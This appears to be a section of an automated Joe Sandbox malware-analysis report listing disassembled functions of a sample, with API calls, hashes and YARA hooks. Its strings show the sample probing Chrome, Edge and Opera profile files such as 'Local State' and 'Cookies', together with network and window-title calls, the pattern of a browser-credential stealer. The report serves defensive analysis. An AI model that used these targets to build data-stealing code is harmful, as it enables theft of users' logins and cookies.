                                                                                                                                                                • Instruction ID: 5beaadcb95aeacb59188730c49d2d6aa3ed27aff66585f67f014d6c7f58db077
                                                                                                                                                                • Opcode Fuzzy Hash: 5cb7550bc193abf6b9f0bcc505508db1402e94844483d9ba157797ff0f9537e1
                                                                                                                                                                • Instruction Fuzzy Hash: 4A218BB440C7469ED754DF24C18479EBBE8BF89708F90882EE5C883380E7799648CB63
                                                                                                                                                                Function 0006C3CC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0006C1CB: PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0006C3DD), ref: 0006C1FE
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,00066537), ref: 0006C3F7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath$char_traits
                                                                                                                                                                • String ID: Network\Cookies
                                                                                                                                                                • API String ID: 521105947-3524344919
                                                                                                                                                                • Opcode ID: 4fcdbee3bfbd10f750a567ba0ae73107ff0595cc6e9d6b71d46154996cbcbec2
                                                                                                                                                                • Instruction ID: cb5ce60cf8b7e47397e00e97246952adf09089cd8b898630125826f51ba79ea1
                                                                                                                                                                • Opcode Fuzzy Hash: 4fcdbee3bfbd10f750a567ba0ae73107ff0595cc6e9d6b71d46154996cbcbec2
                                                                                                                                                                • Instruction Fuzzy Hash: A9F08931950229568B04F7E4DC53CFD777DAF14710B44413AB942A3193DF749A49C7D0
                                                                                                                                                                Function 0006C42F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0006C105: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0006C245), ref: 0006C138
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,00066542), ref: 0006C45A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath$char_traits
                                                                                                                                                                • String ID: User Data\Local State
                                                                                                                                                                • API String ID: 521105947-3604364636
                                                                                                                                                                • Opcode ID: 6a41e7fd1cfa67629fb2a43154e2ac852f233df27c045fdb80cad3b00a500388
                                                                                                                                                                • Instruction ID: 70399c679d3991f9e4ff013e184b2ec0cb5e951dc9a0ae6ae74dfb809850e778
                                                                                                                                                                • Opcode Fuzzy Hash: 6a41e7fd1cfa67629fb2a43154e2ac852f233df27c045fdb80cad3b00a500388
                                                                                                                                                                • Instruction Fuzzy Hash: C1F05E31A102299A8B04F7E4EC63CFDB77AAF01710B44412AF94263193EF609A4986E0
                                                                                                                                                                Function 0006C492 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0006C168: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,0006C314), ref: 0006C19B
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,0006654D), ref: 0006C4BD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath$char_traits
                                                                                                                                                                • String ID: User Data\Local State
                                                                                                                                                                • API String ID: 521105947-3604364636
                                                                                                                                                                • Opcode ID: 36a0b8628c10f5cb6aa7011233deff0b5e20ce24b2eaaf6bb7b787d047d179be
                                                                                                                                                                • Instruction ID: 4c1a4bf902de15251a9b219e2d4f61ea85cb98bc4a50238cbd4c0959e33e7dd1
                                                                                                                                                                • Opcode Fuzzy Hash: 36a0b8628c10f5cb6aa7011233deff0b5e20ce24b2eaaf6bb7b787d047d179be
                                                                                                                                                                • Instruction Fuzzy Hash: 14F05E319502299B8B04F7E4EC52CFEB77AAF10B10B44412AB94263193EF60AA4987D0
                                                                                                                                                                Function 0006C4F5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0006C1CB: PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0006C3DD), ref: 0006C1FE
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,00066558), ref: 0006C520
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath$char_traits
                                                                                                                                                                • String ID: Local State
                                                                                                                                                                • API String ID: 521105947-22827320
                                                                                                                                                                • Opcode ID: 943479deeced87a09ecb63624d9d2009161d4bb7400834c7be6a30d60f6013bb
                                                                                                                                                                • Instruction ID: e6ac7d6b8cc8943fb4ea43d50a1815e2fc8e97e16833dea415e1e98310a8b129
                                                                                                                                                                • Opcode Fuzzy Hash: 943479deeced87a09ecb63624d9d2009161d4bb7400834c7be6a30d60f6013bb
                                                                                                                                                                • Instruction Fuzzy Hash: B3F08231A102299A8B04F7E4EC53CFEB77AAF05710B44412AB902A3193EF70AA4987D0
                                                                                                                                                                Function 000799A6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 000799BA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                                                                • String ID: @
                                                                                                                                                                • API String ID: 1890195054-2766056989
                                                                                                                                                                • Opcode ID: 9050c5fc0b543d3a5147498fa1c846802d3a5ee810ebd6e50de0d96a7edc29ed
                                                                                                                                                                • Instruction ID: 5bd6351dc2371cbe2b27d916dfe97a0f90a75eec17a9b1def8bea926bfb5416d
                                                                                                                                                                • Opcode Fuzzy Hash: 9050c5fc0b543d3a5147498fa1c846802d3a5ee810ebd6e50de0d96a7edc29ed
                                                                                                                                                                • Instruction Fuzzy Hash: 5AD017B5802328AFC720DFA8E904A8DBBFCFB08210F00016AEC49E3700E774A8008B91
                                                                                                                                                                Function 6FE9BE1A Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6FE9B951: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 6FE9B97C
                                                                                                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,6FE9BC61,?,00000000,?,00000000,?), ref: 6FE9BE7B
                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,6FE9BC61,?,00000000,?,00000000,?), ref: 6FE9BEB7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 546120528-0
                                                                                                                                                                • Opcode ID: c12e60de3dcd9893bfcc5d1754bfcc7ce4bad826bd9e8b5b059e4a0e82a61c57
                                                                                                                                                                • Instruction ID: 10561ffd1be86fac20b3ab0dac3f64513b04d1b57ec1174e724909926b7c959f
                                                                                                                                                                • Opcode Fuzzy Hash: c12e60de3dcd9893bfcc5d1754bfcc7ce4bad826bd9e8b5b059e4a0e82a61c57
                                                                                                                                                                • Instruction Fuzzy Hash: E151F470E043459EDB20CF79C8906AABFF5EF46308F24446ED0968B291D775A646CFA0
                                                                                                                                                                Function 6FE47F90 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 159memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNEL32 ref: 6FE480A7
                                                                                                                                                                  • Part of subcall function 6FE74280: CreateWaitableTimerExW.KERNEL32(00000000,00000000,00000002,001F0003,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE742AB
                                                                                                                                                                  • Part of subcall function 6FE74280: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE74311
                                                                                                                                                                  • Part of subcall function 6FE74280: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE7431E
                                                                                                                                                                  • Part of subcall function 6FE74280: CloseHandle.KERNEL32(00000000,?,?,6FEAD00C,?,?,6FE6B4F1), ref: 6FE74327
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: TimerWaitable$AllocCloseCreateHandleObjectSingleVirtualWait
                                                                                                                                                                • String ID: fo
                                                                                                                                                                • API String ID: 3175046113-2511409620
                                                                                                                                                                • Opcode ID: 6f40ed829f073feb406e1d0818b7925a92e0cec4a6bada2ff18dfdea4bfdf245
                                                                                                                                                                • Instruction ID: 69a67959ca5c29bbe5aad7cd2eaf2d2f160ef409ebb22115a06892e774dd5dd3
                                                                                                                                                                • Opcode Fuzzy Hash: 6f40ed829f073feb406e1d0818b7925a92e0cec4a6bada2ff18dfdea4bfdf245
                                                                                                                                                                • Instruction Fuzzy Hash: 5E81BFB4904318CFDB14CF68D985B8DBBB0BF4A304F20829ED819AB391D7359A84CF91
                                                                                                                                                                Function 6FE7D570 Relevance: 3.1, APIs: 2, Instructions: 91threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateThread.KERNEL32(00000000,?,Function_0003D6D0,00000000,00010000,00000000), ref: 6FE7D5DB
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7D633
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateErrorLastThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1689873465-0
                                                                                                                                                                • Opcode ID: f0d428348aa2465c87983cacb115ae401860f1f8623d360b189f4aeda571a4e0
                                                                                                                                                                • Instruction ID: 069a9e8cf4b9de9a850419d9b38d19829ca1a981639a027871766999577cb73a
                                                                                                                                                                • Opcode Fuzzy Hash: f0d428348aa2465c87983cacb115ae401860f1f8623d360b189f4aeda571a4e0
                                                                                                                                                                • Instruction Fuzzy Hash: F03181B5A003099FDB20DF58DC45B9ABFB5FF09714F144029EA58A7381D771A910CBA5
                                                                                                                                                                Function 6FE90916 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 6FE90963
                                                                                                                                                                  • Part of subcall function 6FE90E1B: InitializeSListHead.KERNEL32(6FED3C88,6FE9096D,6FEBB238,00000010,6FE908FE,?,?,?,6FE90B26,?,00000001,?,?,00000001,?,6FEBB280), ref: 6FE90E20
                                                                                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6FE909CD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3231365870-0
                                                                                                                                                                • Opcode ID: d365bb0fd9fedb390634005b26fb25d4c25a7a57058b53e12e2207156f77299b
                                                                                                                                                                • Instruction ID: 4902172255f9e427c4609a3e754d8161d991a83fe473c7d8567dfddcee5e4371
                                                                                                                                                                • Opcode Fuzzy Hash: d365bb0fd9fedb390634005b26fb25d4c25a7a57058b53e12e2207156f77299b
                                                                                                                                                                • Instruction Fuzzy Hash: A3212432548305AEEF016BB898053DD3FA28F9336CF70541ECA446B2C2CB729142C6B6
                                                                                                                                                                Function 0006496F Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00064994
                                                                                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,00000000,?,?,?,?,?,000654A7,?,?,00000000), ref: 000649D0
                                                                                                                                                                  • Part of subcall function 000649E0: WSAStartup.WS2_32(00000202,00000000), ref: 000649F5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateEventStartupsocket
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1953588214-0
                                                                                                                                                                • Opcode ID: 65b18c74bb47b5c35fec40572d9ea3b69ff4a0aa94dfa075396ce98bcfce16d0
                                                                                                                                                                • Instruction ID: 34dfa68ea29a8f1c6fc539f83c2b4812b42b35aa0696715f14a29d0a39d57965
                                                                                                                                                                • Opcode Fuzzy Hash: 65b18c74bb47b5c35fec40572d9ea3b69ff4a0aa94dfa075396ce98bcfce16d0
                                                                                                                                                                • Instruction Fuzzy Hash: 7E015EB1448B909FE7358F28A845696BFE5AB16304F044E5EF0DA83B91D3B5A441CB21
                                                                                                                                                                Function 00061686 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: a377ecd2971cf6ac0a5b434806f6b57092c32b7185bf533928d963ee8fef7b29
                                                                                                                                                                • Instruction ID: cd8e17b1ee7769f5cf4230e37c4fb19a95173672150dec70d7003d7fa5bd6675
                                                                                                                                                                • Opcode Fuzzy Hash: a377ecd2971cf6ac0a5b434806f6b57092c32b7185bf533928d963ee8fef7b29
                                                                                                                                                                • Instruction Fuzzy Hash: 5DF0BE716182055ADF1C8F38E855BFD379A9F00364B2C8B2EF42ACA1C2D771E9908208
                                                                                                                                                                Function 6FE98BC9 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LCMapStringEx.KERNEL32(?,6FEA1144,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 6FE98BFD
                                                                                                                                                                • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,6FEA1144,?,?,-00000008,?,00000000), ref: 6FE98C1B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: String
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2568140703-0
                                                                                                                                                                • Opcode ID: 0c0087674c33d480b6330302da4eea0b7406e1a4cddcd05955723a52c71c13c1
                                                                                                                                                                • Instruction ID: 7d1055da7e9bee13f54d48e89bb394aef71be71ba9f7235c38b69620f650f9cd
                                                                                                                                                                • Opcode Fuzzy Hash: 0c0087674c33d480b6330302da4eea0b7406e1a4cddcd05955723a52c71c13c1
                                                                                                                                                                • Instruction Fuzzy Hash: E4F0C63240022ABBCF121F90CD04DCE3F26EF4A3A0F108511FA1825070CB32CA72ABA2
                                                                                                                                                                Function 00079C61 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00079C83
                                                                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00079C96
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ForegroundText
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 29597999-0
                                                                                                                                                                • Opcode ID: 335f1f9728757904861a5f8e5394cc6e1406b0bf78b269eab9ab25ac444ae8dd
                                                                                                                                                                • Instruction ID: 85dbf026a8787ee42ba5c98d1fce0e2ec9bbf609ba6abf0f6672d06c1649b3f2
                                                                                                                                                                • Opcode Fuzzy Hash: 335f1f9728757904861a5f8e5394cc6e1406b0bf78b269eab9ab25ac444ae8dd
                                                                                                                                                                • Instruction Fuzzy Hash: 86E0D872A0031827FB20A7A4AC4EFD5776CD704700F000199F91CD3183E9A5AA04CBE0
                                                                                                                                                                Function 00073229 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • getaddrinfo.WS2_32(00000000,00000000,00000000,000CFADC,000D2318,00000000,000734C8,00000000,00000001), ref: 0007324B
                                                                                                                                                                • WSASetLastError.WS2_32(00000000), ref: 00073250
                                                                                                                                                                  • Part of subcall function 000730BE: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0007310A
                                                                                                                                                                  • Part of subcall function 000730BE: LoadLibraryA.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00073150
                                                                                                                                                                  • Part of subcall function 000730BE: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0007316A
                                                                                                                                                                  • Part of subcall function 000730BE: FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00000000,00000000), ref: 00073175
                                                                                                                                                                  • Part of subcall function 000730BE: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000731B2
                                                                                                                                                                  • Part of subcall function 000730BE: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 000731C4
                                                                                                                                                                  • Part of subcall function 000730BE: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000731CF
